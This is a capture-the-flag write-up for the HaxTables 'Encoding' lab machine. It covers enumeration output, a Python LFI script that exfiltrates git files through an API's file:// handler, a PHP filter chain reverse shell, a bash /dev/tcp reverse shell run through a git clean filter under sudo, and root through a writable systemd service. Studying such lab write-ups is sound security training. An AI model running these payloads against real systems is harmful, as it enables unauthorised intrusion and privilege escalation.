# Encoding! ## @Author : M3tr1c_r00t  ### Enumeration... #### nmap ``` # Nmap 7.93 scan initiated Sat Jan 28 22:34:45 2023 as: nmap -sC -sV -A -p 22,80 -oN nmapports.txt 10.129.12.218 Nmap scan report for 10.129.12.218 Host is up (0.23s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA) |_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: HaxTables Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 231.62 ms 10.10.14.1 2 231.76 ms 10.129.12.218 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jan 28 22:35:06 2023 -- 1 IP address (1 host up) scanned in 22.22 seconds ``` #### Gobuster... ``` /.hta  (Status: 403) [Size: 278] /.htaccess  (Status: 403) [Size: 278] /.htpasswd  (Status: 403) [Size: 278] /assets  (Status: 301) [Size: 315] [--> http://haxtables.htb/assets/] /includes  (Status: 301) [Size: 317] [--> http://haxtables.htb/includes/] /index.php  (Status: 200) [Size: 1999] /server-status  (Status: 403) [Size: 278] ``` ### Foothold... This seems to be a site which we can use to do various data conversions.  If we visit the api page, we can se how we can use python request module to do the conversions on the api subdomain of the website.  We can actually do a sub-domain enumeration.  In the url request for converting strings to hex, there is an lfi. We can actually use the 'file://{file}'. So for this, I made an lfi script. In the above sub-domain enumeration, there was a subdomain,image, but we didnt have any access to it. So we can try and use the lfi and read its contents starting with the index page.  On the index,php, we can see there is a util.php which is required by the page, so we can take a look at it.  From the exec function, we can see that there might be a .git repository on this sub-domain. We can confirm this by reading the contents of /HEAD.  And we can see it does indeed exist. Well, since we cant directly access the .git repository via the website do to permissions issues, we can try and use the lfi script that we have to read the files of the git repository. But there is a specific way in which scripts do the dumping. But since we cant start making our very own git dumper tool from scratch, we can get the git-dunmper bash script and we can get modify it to run with our lfi script. So, here is the python lfi script... ``` import requests import sys def from_hex(data_json): return bytes.fromhex(data_json) json_data = { 'action': 'str2hex', 'file_url' : f'file:///var/www/image/.git/{sys.argv[1]}' } response = requests.post('http://api.haxtables.htb/v3/tools/string/index.php', json=json_data) with open(sys.argv[2], "wb") as f: f.write(from_hex(dict(response.json())['data'])) ``` Modifying the gitdumper bash script... So just look for this part in the git-dumper script a, comment out the curl line and add in your script so that it can be used to access the files.  Executing the script...  Since I didn't find anything really helpful on the logs, we can check for present files in the repository.  We can see a really interesting file, ```actions/action_handler.php```. We can check it out.  Contents...  We can actually see a get parameter and there is no filtering going on, so this can be our entry point. We can use this together with the php chain filters to get command execution. First off, let's set up the request on burpsuite. We can interpret the url request on the api page...  Then, lets set up our php filter chain payload and set up the server...  Then send the payload as part of the url...  In the url, we can access it as an email to enable the server to be able to curl the request to the internal php script. Then give it the file location and the vulnerable extension. And we get our reverse shell.  ### www-data to user. If we run sudo -l, we can see that we can run a script as svc user. ``` u=$(/usr/bin/git --git-dir=/var/www/image/.git --work-tree=/var/www/image ls-files -o --exclude-standard) ``` This line runs the git ls-files command with some options to list all untracked files (-o) in the repository located in /var/www/image/.git, excluding any files that are ignored by Git (--exclude-standard). The output of this command is then stored in the variable $u. ``` if [[ $u ]]; then /usr/bin/git --git-dir=/var/www/image/.git --work-tree=/var/www/image add -A else /usr/bin/git --git-dir=/var/www/image/.git --work-tree=/var/www/image commit -m "Commited from API!" --author="james <james@haxtables.htb>" --no-verify fi ``` This is an if statement that checks if the variable $u is not empty. If $u is not empty, it means there are untracked files in the repository, so the script runs the git add -A command to stage all changes (including deletions) for the next commit. If $u is empty, it means there are no untracked files in the repository, so the script runs the git commit command with some options to commit any changes, with the commit message "Commited from API!", and specifying the author as "james james@haxtables.htb". The --no-verify option skips any pre-commit hooks that may be configured in the repository. We can actually exploit this by creating our very own git repository and make for a command execution. #### access to user. make a file in /tmp called rev... add the following... Make the file executable. ``` #!/bin/bash bash -i >& /dev/tcp/10.10.14.56/9001 0>&1 ``` Then run the following commands in the /var/www/image directory... ``` git init echo '*.php filter=indent' > .git/info/attributes git config filter.indent.clean /tmp/rev sudo -u svc /var/www/image/scripts/git-commit.sh ``` set up a istener before running the sudo command. #### code explanation... - git init - initializes a new Git repository in the current directory. It creates a new .git directory that contains all the Git metadata and configuration for the repository. - echo '*.php filter=indent' > .git/info/attributes - This creates a new file called .git/info/attributes and writes the line *.php filter=indent to it. This line defines a new Git attribute for files with a .php extension. The filter=indent part specifies that Git should apply a text filtering command to these files when they are committed to the repository. - git config filter.indent.clean /tmp/rev This sets the clean command for the indent filter to /tmp/rev. This means that whenever Git applies the indent filter to a file during a commit, it will execute the /tmp/rev command on the file's contents first. So, whenever we do a commit, we can actually get the /tmp/rev file being executed as it checks for php scripts.  And we get access as svc user.  ### user to root. I created a ssh-key pair and uploaded it to the machine so that i could login with ssh.  If we run sudo -l on the machine, we can see that we can run ```/usr/bin/systemcl restart *``` as root.  ``` https://linuxhandbook.com/create-systemd-services/ https://medium.com/@benmorel/creating-a-linux-service-with-systemd-611b5c8b91d6 ``` We can actually use the systemctl command to execute services. In this case, for priv esc, we can actually create our malicious code and try to restart it to make the bin/bash binary suid executable. The services are usually stored in /etc/systemd/system directory. If we check the permissions, we can see that we dont have any write permissions, but we do have read and execute permissions.  If you look keenly, there is a ```+``` sign in the file permissions part. This symbol indicates there are additional permissions or ACLs (Access Control Lists) associated with the file/directory. We can actually check this permissions using the ```getfacl``` command.  And we can see that we have a masked write permissions. We can't directly save a file into them, but we can save anything in the directory using the echo command. So,we can save our malicious service and execute it.  And we are root!  And Done!  ### Socials @instagram : https://instagram.com/Metric_r00t <br>@Twitter : https://twitter.com/M3tr1c_r00t